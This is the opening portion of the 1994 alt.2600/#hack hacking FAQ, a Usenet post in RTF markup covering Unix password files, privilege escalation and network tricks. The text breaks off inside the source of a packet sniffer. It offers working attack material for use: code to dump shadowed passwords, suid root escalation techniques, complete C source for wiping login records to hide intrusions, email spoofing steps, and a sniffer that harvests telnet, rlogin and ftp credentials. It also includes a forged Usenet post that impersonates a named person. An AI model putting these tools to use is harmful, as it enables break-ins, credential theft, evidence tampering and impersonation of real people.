\f0\b0\i0\outl0\shad0\fs20 \cf0 \expan0 \ul0 From will@gnu.ai.mit.edu (Will Spencer)\line Newsgroups: alt.2600,alt.answers,news.answers\line Subject: alt.2600 FAQ, Beta .010 - Part 1/1\line Followup-To: alt.2600\line Reply-To: will@gnu.ai.mit.edu (FAQ Comments address)\line Summary: This posting contains a list of Frequently Asked\line \line Questions (and their answers) about hacking. It\line \line should be read by anyone who wishes to post to the\line \line alt.2600 newsgroup or use the IRC channel #hack.\line \line Archive-name: alt-2600-faq\line Posting-Frequency: Random\line Last-Modified: 1994/12/18\line Version: Beta .010\line \line \line Editors Note: Welcome to Beta .010 of the alt.2600/#hack FAQ!\line \line Eleet greets go out to Outsider for producing an\line excellent WWW version of this document at:\line http://www.engin.umich.edu/~jgotts/hack-faq.html\line \line The purpose of this FAQ is to give you a general\line introduction to the topics covered in alt.2600 and\line #hack. No document will make you a hacker.\line \line If you have a questions regarding any of the topics\line covered in the FAQ, please direct it to alt.2600 or\line #hack. Please do not e-mail me with them, I'm getting\line swamped.\line \line If your copy of the #hack FAQ does not end with the\line letters EOT on a line by themselves, you do not have the\line entire FAQ.\line \line \line ** BETA **\line \line Beta Revision .010\line \line \line \line \line alt.2600/#Hack F.A.Q.\line \line A TNO Communication Production\line \line by\line \line \line \line \line Voyager\line \line \line \line will@gnu.ai.mit.edu\line \line \line \line \line \line Sysop of\line \line \line \line Hacker's Haven\line \line \line \line (303)343-4053\line \line \line \line \line With special thanks to:\line \line A-Flat, Al, Aleph1, Bluesman, C-Curve, DeadKat, Edison,\line Hobbit, KCrow, Major, Marauder, Novocain, Outsider, Presence,\line Rogue Agent, sbin, Taran King, Tomes and TheSaint.\line \line \line \line \line We work in the dark\line \line \line We do what we can\line \line \line We give what we have\line \line \line Our doubt is our passion,\line \line \line and our passion is our task\line \line \line The rest is the madness of art.\line \line \line \line \line \line -- Henry James\line \line \line \line Section A: Computers\line \line 01. How do I access the password file under Unix?\line U 02. How do I crack Unix passwords?\line 03. What is password shadowing?\line 04. Where can I find the password file if it's shadowed?\line 05. What is NIS/yp?\line 06. What are those weird characters after the comma in my passwd file?\line 07. How do I access the password file under VMS?\line 08. How do I crack VMS passwords?\line 09. How do I break out of a restricted shell?\line 10. How do I gain root from a suid script or program?\line 11. How do I erase my presence from the system logs?\line 12. How do I send fakemail?\line 13. How do I fake posts to UseNet?\line 14. How do I hack ChanOp on IRC?\line 15. How do I modify the IRC client to hide my real username?\line U 16. How to I change to directories with strange characters in them?\line 17. What is ethernet sniffing?\line 18. What is an Internet Outdial?\line 19. What are some Internet Outdials?\line U 20. What is this system?\line U 21. What are the default accounts for XXX ?\line 22. What port is XXX on?\line 23. What is a trojan/worm/virus/logic bomb?\line U 24. How can I protect myself from virii and such?\line 25. What is Cryptoxxxxxxx?\line 26. What is PGP?\line U 27. What is Tempest?\line 28. What is an anonymous remailer?\line 29. What are the addresses of some anonymous remailers?\line 30. How do I defeat copy protection?\line 31. What is 127.0.0.1?\line \line \line Section B: Telephony\line \line U 01. What is a Red Box?\line U 02. How do I build a Red Box?\line 03. Where can I get a 6.5536Mhz crystal?\line 04. Which payphones will a Red Box work on?\line N 05. How do I make local calls with a Red Box?\line U 06. What is a Blue Box?\line 07. Do Blue Boxes still work?\line 08. What is a Black Box?\line U 09. What do all the colored boxes do?\line 10. What is an ANAC number?\line 11. What is the ANAC number for my area?\line 12. What is a ringback number?\line U 13. What is the ringback number for my area?\line 14. What is a loop?\line U 15. What is a loop in my area?\line U 16. What is a CNA number?\line U 17. What is the telephone company CNA number for my area?\line U 18. What are some numbers that always ring busy?\line U 19. What are some numbers that temporarily disconnect phone service?\line 20. What is scanning?\line 21. Is scanning illegal?\line 22. Where can I purchase a lineman's handset?\line 23. What are the DTMF frequencies?\line 24. What are the frequencies of the telephone tones?\line U 25. What are all of the * codes?\line 26. What frequencies do cordless phones operate on?\line \line \line Section C: Resources\line \line U 01. What are some ftp sites of interest to hackers?\line U 02. What are some newsgroups of interest to hackers?\line U 03. What are some telnet sites of interest to hackers?\line U 04. What are some gopher sites of interest to hackers?\line U 05. What are some World wide Web (WWW) sites of interest to hackers?\line 06. What are some IRC channels of interest to hackers?\line U 07. What are some BBS's of interest to hackers?\line U 08. What books are available on this subject?\line U 09. What are some mailing lists of interest to hackers?\line U 10. What are some print magazines of interest to hackers?\line U 11. What are some organizations of interest to hackers?\line 12. Where can I purchase a magnetic stripe encoder/decoder?\line N 13. What are the rainbow books and how can I get them?\line \line \line Section D: 2600\line \line 01. What is alt.2600?\line 02. What does "2600" mean?\line 03. Are there on-line versions of 2600 available?\line 04. I can't find 2600 at any bookstores. What can I do?\line 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?\line \line \line Section E: Miscellaneous\line \line 01. What does XXX stand for?\line 02. How do I determine if I have a valid credit card number?\line 03. What bank issued this credit card?\line 04. What are the ethics of hacking?\line U 05. Where can I get a copy of the alt.2600/#hack FAQ?\line \line \line \line U == Updated since last release of the #hack FAQ\line N == New since last release of the #hack FAQ\line \line \line \line \line Section A: Computers\line ~~~~~~~~~~~~~~~~~~~~\line \line 01. How do I access the password file under Unix?\line \line In standard Unix the password file is /etc/passwd. On a Unix system\line with either NIS/yp or password shadowing, much of the password data\line may be elsewhere.\line \line \line 02. How do I crack Unix passwords?\line \line Contrary to popular belief, Unix passwords cannot be decrypted. Unix\line passwords are encrypted with a one way function. The login program\line encrypts the text you enter at the "password:" prompt and compares\line that encrypted string against the encrypted form of your password.\line \line Password cracking software uses wordlists. Each word in the wordlist\line is encrypted and the results are compared to the encrypted form of the\line target password.\line \line The best cracking program for Unix passwords is currently Crack by\line Alec Muffett. For PC-DOS, the best package to use is currently\line CrackerJack.\line \line \line 03. What is password shadowing?\line \line Password shadowing is a security system where the encrypted password\line field of /etc/passwd is replaced with a special token and the\line encrypted password is stored in a separate file which is not readable\line by normal system users.\line \line To defeat password shadowing on many (but not all) systems, write a\line program that uses successive calls to getpwent() to obtain the\line password file.\line \line Example:\line \line #include <pwd.h>\line main()\line {\line struct passwd *p;\line while(p=getpwent())\line printf("%s:%s:%d:%d:%s:%s:%s\\n", p->pw_name, p->pw_passwd,\line p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);\line }\line \line \line 04. Where can I find the password file if it's shadowed?\line \line Unix Path Token\line -----------------------------------------------------------------\line AIX 3 /etc/security/passwd !\line or /tcb/auth/files/<first letter #\line of username>/<username>\line A/UX 3.0s /tcb/files/auth/?/*\line BSD4.3-Reno /etc/master.passwd *\line ConvexOS 10 /etc/shadpw *\line ConvexOS 11 /etc/shadow *\line DG/UX /etc/tcb/aa/user/ *\line EP/IX /etc/shadow x\line HP-UX /.secure/etc/passwd *\line IRIX 5 /etc/shadow x\line Linux 1.1 /etc/shadow *\line OSF/1 /etc/passwd[.dir|.pag] *\line SCO Unix #.2.x /tcb/auth/files/<first letter *\line of username>/<username>\line SunOS4.1+c2 /etc/security/passwd.adjunct ##username\line SunOS 5.0 /etc/shadow\line <optional NIS+ private secure maps/tables/whatever>\line System V Release 4.0 /etc/shadow x\line System V Release 4.2 /etc/security/* database\line Ultrix 4 /etc/auth[.dir|.pag] *\line UNICOS /etc/udb *\line \line \line 05. What is NIS/yp?\line \line NIS (Network Information System) in the current name for what was once\line known as yp (Yellow Pages). The purpose for NIS is to allow many\line machines on a network to share configuration information, including\line password data. NIS is not designed to promote system security. If\line your system uses NIS you will have a very short /etc/passwd file that\line includes a line that looks like this:\line \line +::0:0:::\line \line To view the real password file use this command "ypcat passwd"\line \line \line 06. What are those weird characters after the comma in my passwd file?\line \line The characters are password aging data. Password aging forces the\line user to change passwords after a System Administrator specified period\line of time. Password aging can also force a user to keep a password for\line a certain number of weeks before changing it.\line \line ]\line ] Sample entry from /etc/passwd with password aging installed:\line ]\line ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash\line ]\line \line Note the comma in the encrypted password field. The characters after\line the comma are used by the password aging mechanism.\line \line ]\line ] Password aging characters from above example:\line ]\line ] M.z8\line ]\line \line The four characters are interpreted as follows:\line \line 1: Maximum number of weeks a password can be used without changing.\line 2: Minimum number of weeks a password must be used before changing.\line 3&4: Last time password was changed, in number of weeks since 1970.\line \line Three special cases should be noted:\line \line If the first and second characters are set to '..' the user will be\line forced to change his/her passwd the next time he/she logs in. The\line passwd program will then remove the passwd aging characters, and the\line user will not be subjected to password aging requirements again.\line \line If the third and fourth characters are set to '..' the user will be\line forced to change his/her passwd the next time he/she logs in. Password\line aging will then occur as defined by the first and second characters.\line \line If the first character (MAX) is less than the second character (MIN),\line the user is not allowed to change his/her password. Only root can\line change that users password.\line \line It should also be noted that the su command does not check the password\line aging data. An account with an expired password can be su'd to\line without being forced to change the password.\line \line \line Password Aging Codes\line +------------------------------------------------------------------------+\line | |\line | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |\line | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |\line | |\line | Character: I J K L M N O P Q R S T U V W X Y Z a b |\line | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |\line | |\line | Character: c d e f g h i j k l m n o p q r s t u v |\line | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |\line | |\line | Character: w x y z |\line | Number: 60 61 62 63 |\line | |\line +------------------------------------------------------------------------+\line \line \line 07. How do I access the password file under VMS?\line \line Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,\line unlike Unix, most users do not have access to read the password file.\line \line \line 08. How do I crack VMS passwords?\line \line Write a program that uses the SYS$GETUAF functions to compare the\line results of encrypted words against the encrypted data in SYSUAF.DAT.\line \line Two such programs are known to exist, CHECK_PASSWORD and\line GUESS_PASSWORD.\line \line \line 09. How do I break out of a restricted shell?\line \line On poorly implemented restricted shells you can break out of the\line restricted environment by running a program that features a shell\line function. A good example is vi. Run vi and use this command:\line \line :set shell=/bin/sh\line \line then shell using this command:\line \line :shell\line \line \line 10. How do I gain root from a suid script or program?\line \line 1. Change IFS.\line \line If the program calls any other programs using the system() function\line call, you may be able to fool it by changing IFS. IFS is the Internal\line Field Separator that the shell uses to delimit arguments.\line \line If the program contains a line that looks like this:\line \line system("/bin/date")\line \line and you change IFS to '/' the shell will them interpret the\line proceeding line as:\line \line bin date\line \line Now, if you have a program of your own in the path called "bin" the\line suid program will run your program instead of /bin/date.\line \line To change IFS, use this command:\line \line IFS='/';export IFS # Bourne Shell\line setenv IFS '/' # C Shell\line export IFS='/' # Korn Shell\line \line \line 2. link the script to -i\line \line Create a symbolic link named "-i" to the program. Running "-i"\line will cause the interpreter shell (/bin/sh) to start up in interactive\line mode. This only works on suid shell scripts.\line \line Example:\line \line % ln suid.sh -i\line % -i\line #\line \line \line 3. Exploit a race condition\line \line Replace a symbolic link to the program with another program while the\line kernel is loading /bin/sh.\line \line Example:\line \line nice -19 suidprog ; ln -s evilprog suidroot\line \line \line 4. Send bad input to the program.\line \line Invoke the name of the program and a separate command on the same\line command line.\line \line Example:\line \line suidprog ; id\line \line \line 11. How do I erase my presence from the system logs?\line \line Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text\line files that can be edited by hand with vi, you must use a program\line specifically written for this purpose.\line \line Example:\line \line #include <sys/types.h>\line #include <stdio.h>\line #include <unistd.h>\line #include <sys/file.h>\line #include <fcntl.h>\line #include <utmp.h>\line #include <pwd.h>\line #include <lastlog.h>\line #define WTMP_NAME "/usr/adm/wtmp"\line #define UTMP_NAME "/etc/utmp"\line #define LASTLOG_NAME "/usr/adm/lastlog"\line \line int f;\line \line void kill_utmp(who)\line char *who;\line {\line struct utmp utmp_ent;\line \line if ((f=open(UTMP_NAME,O_RDWR))>=0) {\line while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )\line if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {\line bzero((char *)&utmp_ent,sizeof( utmp_ent ));\line lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);\line write (f, &utmp_ent, sizeof (utmp_ent));\line }\line close(f);\line }\line }\line \line void kill_wtmp(who)\line char *who;\line {\line struct utmp utmp_ent;\line long pos;\line \line pos = 1L;\line if ((f=open(WTMP_NAME,O_RDWR))>=0) {\line \line while(pos != -1L) {\line lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);\line if (read (f, &utmp_ent, sizeof (struct utmp))<0) {\line pos = -1L;\line } else {\line if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {\line bzero((char *)&utmp_ent,sizeof(struct utmp ));\line lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);\line write (f, &utmp_ent, sizeof (utmp_ent));\line pos = -1L;\line } else pos += 1L;\line }\line }\line close(f);\line }\line }\line \line void kill_lastlog(who)\line char *who;\line {\line struct passwd *pwd;\line struct lastlog newll;\line \line if ((pwd=getpwnam(who))!=NULL) {\line \line if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {\line lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);\line bzero((char *)&newll,sizeof( newll ));\line write(f, (char *)&newll, sizeof( newll ));\line close(f);\line }\line \line } else printf("%s: ?\\n",who);\line }\line \line main(argc,argv)\line int argc;\line char *argv[];\line {\line if (argc==2) {\line kill_lastlog(argv[1]);\line kill_wtmp(argv[1]);\line kill_utmp(argv[1]);\line printf("Zap2!\\n");\line } else\line printf("Error.\\n");\line }\line \line \line 12. How do I send fakemail?\line \line Telnet to port 25 of the machine you want the mail to appear to\line originate from. Enter your message as in this example:\line \line HELO bellcore.com\line MAIL FROM:Voyager@bellcore.com\line RCPT TO:president@whitehouse.gov\line DATA\line \line \line Please discontinue your silly Clipper initiative.\line .\line QUIT\line \line On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"\line line will not work. Test by sending yourself fakemail first.\line \line For more informationm read RFC 822 "Standard for the format of ARPA\line Internet text messages."\line \line \line 13. How do I fake posts to UseNet?\line \line Use inews to post. Give inews the following lines:\line \line From:\line Newsgroups:\line Subject:\line Message-ID:\line Date:\line Organization:\line \line For a moderated newsgroup, inews will also require this line:\line \line Approved:\line \line Then add your post and terminate with <Control-D>.\line \line Example:\line \line From: Eric S. Real\line Newsgroups: alt.hackers\line Subject: Pathetic bunch of wannabe losers\line Message-ID: <esr.123@locke.ccil.org>\line Date: Fri, 13 Aug 1994 12:15:03\line Organization: Moral Majority\line \line A pathetic bunch of wannabe losers is what most of you are, with no\line right to steal the honorable title of `hacker' to puff up your silly\line adolescent egos. Get stuffed, get lost, and go to jail.\line \line Eric S. Real <esr@locke.ccil.org>\line \line \line ^D\line \line Note that many systems will append an Originator: line to your message\line header, effectively revealing the account from which the message was\line posted.\line \line \line 14. How do I hack ChanOp on IRC?\line \line Find a server that is split from the rest of IRC and create your own\line channel there using the name of the channel you want ChanOp on. When\line that server reconnects to the net, you will have ChanOp on the real\line channel. If you have ServerOp on a server, you can cause it to split\line on purpose.\line \line \line 15. How do I modify the IRC client to hide my real username?\line \line Get the IRC client from cs.bu.edu /irc/clients. Look at the source\line code files irc.c and ctcp.c. The code you are looking for is fairly\line easy to spot. Change it. Change the username code in irc.c and the\line ctcp information code in ctcp.c. Compile and run your client.\line \line Here are the diffs from a sample hack of the IRC client. Your client\line code will vary slightly depending on what IRC client version you are\line running.\line \line *** ctcp.c.old Wed Feb 10 10:08:05 1993\line --- ctcp.c Fri Feb 12 04:33:55 1993\line ***************\line *** 331,337 ****\line \line struct passwd *pwd;\line \line long diff;\line \line int uid;\line ! char c;\line \line \line /*\line \line * sojge complained that ircII says 'idle 1 seconds'\line --- 331,337 ----\line \line struct passwd *pwd;\line \line long diff;\line \line int uid;\line ! char c, *fing;\line \line \line /*\line \line * sojge complained that ircII says 'idle 1 seconds'\line ***************\line *** 348,354 ****\line \line if (uid != DAEMON_UID)\line \line {\line #endif /* DAEMON_UID */ \line ! if (pwd = getpwuid(uid))\line \line \line {\line \line \line \line char *tmp;\line \line --- 348,356 ----\line \line if (uid != DAEMON_UID)\line \line {\line #endif /* DAEMON_UID */ \line ! if (fing = getenv("IRCFINGER"))\line ! send_ctcp_reply(from, ctcp->name, fing, diff, c);\line ! else if (pwd = getpwuid(uid))\line \line \line {\line \line \line \line char *tmp;\line \line *** irc.c.old Wed Feb 10 06:33:11 1993\line --- irc.c Fri Feb 12 04:02:11 1993\line ***************\line *** 510,516 ****\line \line \line malloc_strcpy(&my_path, "/");\line \line if (*realname == null(char))\line \line \line strmcpy(realname, "*Unknown*", REALNAME_LEN);\line ! if (*username == null(char))\line \line {\line \line \line if (ptr = getenv("USER"))\line \line \line \line strmcpy(username, ptr, NAME_LEN);\line --- 510,518 ----\line \line \line malloc_strcpy(&my_path, "/");\line \line if (*realname == null(char))\line \line \line strmcpy(realname, "*Unknown*", REALNAME_LEN);\line ! if (ptr = getenv("IRCUSER"))\line ! strmcpy(username, ptr, NAME_LEN);\line ! else if (*username == null(char))\line \line {\line \line \line if (ptr = getenv("USER"))\line \line \line \line strmcpy(username, ptr, NAME_LEN);\line \line \line 16. How to I change to directories with strange characters in them?\line \line These directories are often used by people trying to hide information,\line most often warez (commercial software).\line \line There are several things you can do to determine what these strange\line characters are. One is to use the arguments to the ls command that\line cause ls to give you more information:\line \line From the man page for ls:\line \line -F Causes directories to be marked with a trailing ``/'',\line \line executable files to be marked with a trailing ``*'', and\line \line symbolic links to be marked with a trailing ``@'' symbol.\line \line -q Forces printing of non-graphic characters in filenames as the\line \line character ``?''.\line \line -b Forces printing of non-graphic characters in the \\ddd\line \line notation, in octal.\line \line Perhaps the most useful tool is to simply do an "ls -al filename" to\line save the directory of the remote ftp site as a file on your local\line machine. Then you can do a "cat -t -v -e filename" too see exactly\line what those bizarre little characters are.\line \line From the man page for cat:\line \line -v Causes non-printing characters (with the exception of tabs,\line \line newlines, and form feeds) to be displayed. Control characters\line \line are displayed as ^X (<Ctrl>x), where X is the key pressed with\line \line the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The\line \line <Del> character (octal 0177) is printed as ^?. Non-ASCII\line \line characters (with the high bit set) are printed as M -x, where\line \line x is the character specified by the seven low order bits.\line \line -t Causes tabs to be printed as ^I and form feeds as ^L. This\line \line option is ignored if the -v option is not specified.\line \line -e Causes a ``$'' character to be printed at the end of each line\line \line (prior to the new-line). This option is ignored if the -v\line \line option is not set.\line \line If the directory name includes a <SPACE> or a <TAB> you will need to\line enclose the entire directory name in quotes. Example:\line \line cd "..<TAB>"\line \line On an IBM-PC, you may enter these special characters by holding down\line the <ALT> key and entering the decimal value of the special character\line on your numeric keypad. When you release the <ALT> key, the special\line character should appear on your screen. An ASCII chart can be very\line helpful.\line \line Sometimes people will create directories with some of the standard\line stty control characters in them, such as ^Z (suspend) or ^C (intr).\line To get into those directories, you will first need to user stty to\line change the control character in qustion to another character.\line \line From the man page for stty:\line \line Control assignments\line \line control-character C\line Sets control-character to C, where control-character is\line erase, kill, intr (interrupt), quit, eof, eol, swtch\line (switch), start, stop or susp.\line \line start and stop are available as possible control char-\line acters for the control-character C assignment.\line \line If C is preceded by a caret (^) (escaped from the\line shell), then the value used is the corresponding con-\line trol character (for example, ^D is a <Ctrl>d; ^? is\line interpreted as DELETE and ^- is interpreted as unde-\line fined).\line \line Use the stty -a command to see your current stty settings, and to\line determine which one is causing you problems.\line \line \line 17. What is ethernet sniffing?\line \line Ethernet sniffing is listening (with software) to the raw ethernet\line device for packets that interest you. When your software sees a\line packet that fits certain criteria, it logs it to a file. The most\line common criteria for an interesting packet is one that contains words\line like "login" or "password."\line \line Many ethernet sniffers are available, here are a few that may be on\line your system now:\line \line OS Sniffer\line ~~ ~~~~~~~\line HP/UX nettl (monitor) & netfmt (display)\line nfswatch /* Available via anonymous ftp */\line Irix nfswatch /* Available via anonymous ftp */\line Etherman\line SunOS etherfind\line nfswatch /* Available via anonymous ftp */\line Solaris snoop\line DOS ETHLOAD /* Available via anonymous ftp as */\line /* ethld104.zip */\line The Gobbler /* Available via anonymous ftp */\line LanPatrol\line LanWatch\line \line \line Netmon\line Netwatch\line Netzhack /* Available via anonymous ftp at */\line /* mistress.informatik.unibw-muenchen.de */\line /* /pub/netzhack.mac */\line Macintosh Etherpeek\line \line Here is source code for an ethernet sniffer:\line \line /* Esniff.c */\line \line #include <stdio.h>\line #include <ctype.h>\line #include <string.h>\line \line #include <sys/time.h>\line #include <sys/file.h>\line #include <sys/stropts.h>\line #include <sys/signal.h>\line #include <sys/types.h>\line #include <sys/socket.h>\line #include <sys/ioctl.h>\line \line #include <net/if.h>\line #include <net/nit_if.h>\line #include <net/nit_buf.h>\line #include <net/if_arp.h>\line \line #include <netinet/in.h>\line #include <netinet/if_ether.h>\line #include <netinet/in_systm.h>\line #include <netinet/ip.h>\line #include <netinet/udp.h>\line #include <netinet/ip_var.h>\line #include <netinet/udp_var.h>\line #include <netinet/in_systm.h>\line #include <netinet/tcp.h>\line #include <netinet/ip_icmp.h>\line \line #include <netdb.h>\line #include <arpa/inet.h>\line \line #define ERR stderr\line \line char *malloc();\line char *device,\line *ProgName,\line *LogName;\line FILE *LOG;\line int debug=0;\line \line #define NIT_DEV "/dev/nit"\line #define CHUNKSIZE 4096 /* device buffer size */\line int if_fd = -1;\line int Packet[CHUNKSIZE+32];\line \line void Pexit(err,msg)\line int err; char *msg;\line { perror(msg);\line exit(err); }\line \line void Zexit(err,msg)\line int err; char *msg;\line { fprintf(ERR,msg);\line exit(err); }\line \line #define IP ((struct ip *)Packet)\line #define IP_OFFSET (0x1FFF)\line #define SZETH (sizeof(struct ether_header))\line #define IPLEN (ntohs(ip->ip_len))\line #define IPHLEN (ip->ip_hl)\line #define TCPOFF (tcph->th_off)\line #define IPS (ip->ip_src)\line #define IPD (ip->ip_dst)\line #define TCPS (tcph->th_sport)\line #define TCPD (tcph->th_dport)\line #define IPeq(s,t) ((s).s_addr == (t).s_addr)\line \line #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))\line \line #define MAXBUFLEN (128)\line time_t LastTIME = 0;\line \line struct CREC {\line struct CREC *Next,\line *Last;\line time_t Time; /* start time */\line struct in_addr SRCip,\line DSTip;\line u_int SRCport, /* src/dst ports */\line DSTport;\line u_char Data[MAXBUFLEN+2]; /* important stuff :-) */\line u_int Length; /* current data length */\line u_int PKcnt; /* # pkts */\line u_long LASTseq;\line };\line \line struct CREC *CLroot = NULL;\line \line char *Symaddr(ip)\line register struct in_addr ip;\line { register struct hostent *he =\line gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);\line \line return( (he)?(he->h_name):(inet_ntoa(ip)) );\line }\line \line char *TCPflags(flgs)\line register u_char flgs;\line { static char iobuf[8];\line #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')\line \line SFL(0,TH_FIN, 'F');\line SFL(1,TH_SYN, 'S');\line SFL(2,TH_RST, 'R');\line SFL(3,TH_PUSH,'P');\line SFL(4,TH_ACK, 'A');\line SFL(5,TH_URG, 'U');\line iobuf[6]=0;\line return(iobuf);\line }\line \line char *SERVp(port)\line register u_int port;\line { static char buf[10];\line register char *p;\line \line switch(port) {\line case IPPORT_LOGINSERVER: p="rlogin"; break;\line case IPPORT_TELNET: p="telnet"; break;\line case IPPORT_SMTP: p="smtp"; break;\line case IPPORT_FTP: p="ftp"; break;\line default: sprintf(buf,"%u",port); p=buf; break;\line }\line return(p);\line }\line \line char *Ptm(t)\line register time_t *t;\line { register char *p = ctime(t);\line p[strlen(p)-6]=0; /* strip " YYYY\\n" */\line return(p);\line }\line \line char *NOWtm()\line { time_t tm;\line time(&tm);\line return( Ptm(&tm) );\line }\line \line #define MAX(a,b) (((a)>(b))?(a):(b))\line #define MIN(a,b) (((a)<(b))?(a):(b))\line \line /* add an item */\line #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \\\line register struct CREC *CLtmp = \\\line (struct CREC *)malloc(sizeof(struct CREC)); \\\line time( &(CLtmp->Time) ); \\\line CLtmp->SRCip.s_addr = SIP.s_addr; \\\line CLtmp->DSTip.s_addr = DIP.s_addr; \\\line CLtmp->SRCport = SPORT; \\\line CLtmp->DSTport = DPORT; \\\line CLtmp->Length = MIN(LEN,MAXBUFLEN); \\\line bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \\\line CLtmp->PKcnt = 1; \\\line CLtmp->Next = CLroot; \\\line CLtmp->Last = NULL; \\\line CLroot = CLtmp; \\\line }\line \line register struct CREC *GET_NODE(Sip,SP,Dip,DP)\line register struct in_addr Sip,Dip;\line register u_int SP,DP;\line { register struct CREC *CLr = CLroot;\line \line while(CLr != NULL) {\line if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&\line IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )\line break;\line CLr = CLr->Next;\line }\line return(CLr);\line }\line \line #define ADDDATA_NODE(CL,DATA,LEN) { \\\line bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \\\line CL->Length += LEN; \\\line }\line \line #define PR_DATA(dp,ln) { \\\line register u_char lastc=0; \\\line while(ln-- >0) { \\\line if(*dp < 32) { \\\line switch(*dp) { \\\line case '\\0': if((lastc=='\\r') || (lastc=='\\n') || lastc=='\\0') \\\line break; \\\line case '\\r': \\\line case '\\n': fprintf(LOG,"\\n : "); \\\line break; \\\line default : fprintf(LOG,"^%c", (*dp + 64)); \\\line break; \\\line } \\\line } else { \\\line if(isprint(*dp)) fputc(*dp,LOG); \\\line else fprintf(LOG,"(%d)",*dp); \\\line } \\\line lastc = *dp++; \\\line } \\\line fflush(LOG); \\\line }\line \line void END_NODE(CLe,d,dl,msg)\line register struct CREC *CLe;\line register u_char *d;\line register int dl;\line register char *msg;\line {\line fprintf(LOG,"\\n-- TCP/IP LOG -- TM: %s --\\n", Ptm(&CLe->Time));\line fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));\line fprintf(LOG," %s(%s)\\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));\line fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\\n",\line NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);\line fprintf(LOG," DATA: ");\line { register u_int i = CLe->Length;\line register u_char *p = CLe->Data;\line PR_DATA(p,i);\line PR_DATA(d,dl);\line }\line \line fprintf(LOG,"\\n-- \\n");\line fflush(LOG);\line \line if(CLe->Next != NULL)\line CLe->Next->Last = CLe->Last;\line if(CLe->Last != NULL)\line CLe->Last->Next = CLe->Next;\line else\line CLroot = CLe->Next;\line free(CLe);\line }\line \line /* 30 mins (x 60 seconds) */\line #define IDLE_TIMEOUT 1800\line #define IDLE_NODE() { \\\line time_t tm; \\\line time(&tm); \\\line if(LastTIME<tm) { \\\line register struct CREC *CLe,*CLt = CLroot; \\\line LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \\\line while(CLe=CLt) { \\\line CLt=CLe->Next; \\\line if(CLe->Time <tm) \\\line END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \\\line } \\\line } \\\line }\line \line void filter(cp, pktlen)\line register char *cp;\line register u_int pktlen;\line {\line register struct ip *ip;\line register struct tcphdr *tcph;\line \line { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);\line \line if(EtherType < 0x600) {\line EtherType = *(u_short *)(cp + SZETH + 6);\line cp+=8; pktlen-=8;\line }\line \line if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */\line return;\line }\line \line /* ugh, gotta do an alignment :-( */\line bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));\line \line ip = (struct ip *)Packet;\line if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */\line return;\line tcph = (struct tcphdr *)(Packet + IPHLEN);\line \line if(!( (TCPD == IPPORT_TELNET) ||\line (TCPD == IPPORT_LOGINSERVER) ||\line (TCPD == IPPORT_FTP)\line )) return;\line \line { register struct CREC *CLm;\line register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));\line register u_char *p = (u_char *)Packet;\line \line p += ((IPHLEN * 4) + (TCPOFF * 4));\line \line if(debug) {\line fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);\line fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));\line fprintf(LOG,"%s[%s]\\n", inet_ntoa(IPD),SERVp(TCPD));\line }\line \line if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {\line \line CLm->PKcnt++;\line \line if(length>0)\line if( (CLm->Length + length) < MAXBUFLEN ) {\line ADDDATA_NODE( CLm, p,length);\line } else {\line END_NODE( CLm, p,length, "DATA LIMIT");\line }\line \line if(TCPFL(TH_FIN|TH_RST)) {\line END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );\line }\line \line } else {\line \line if(TCPFL(TH_SYN)) {\line ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);\line }\line \line }\line \line IDLE_NODE();\line \line }\line \line }\line \line /* signal handler\line */\line void death()\line { register struct CREC *CLe;\line \line while(CLe=CLroot)\line END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");\line \line fprintf(LOG,"\\nLog ended at => %s\\n",NOWtm());\line fflush(LOG);\line if(LOG != stdout)\line fclose(LOG);\line exit(1);\line }\line \line }
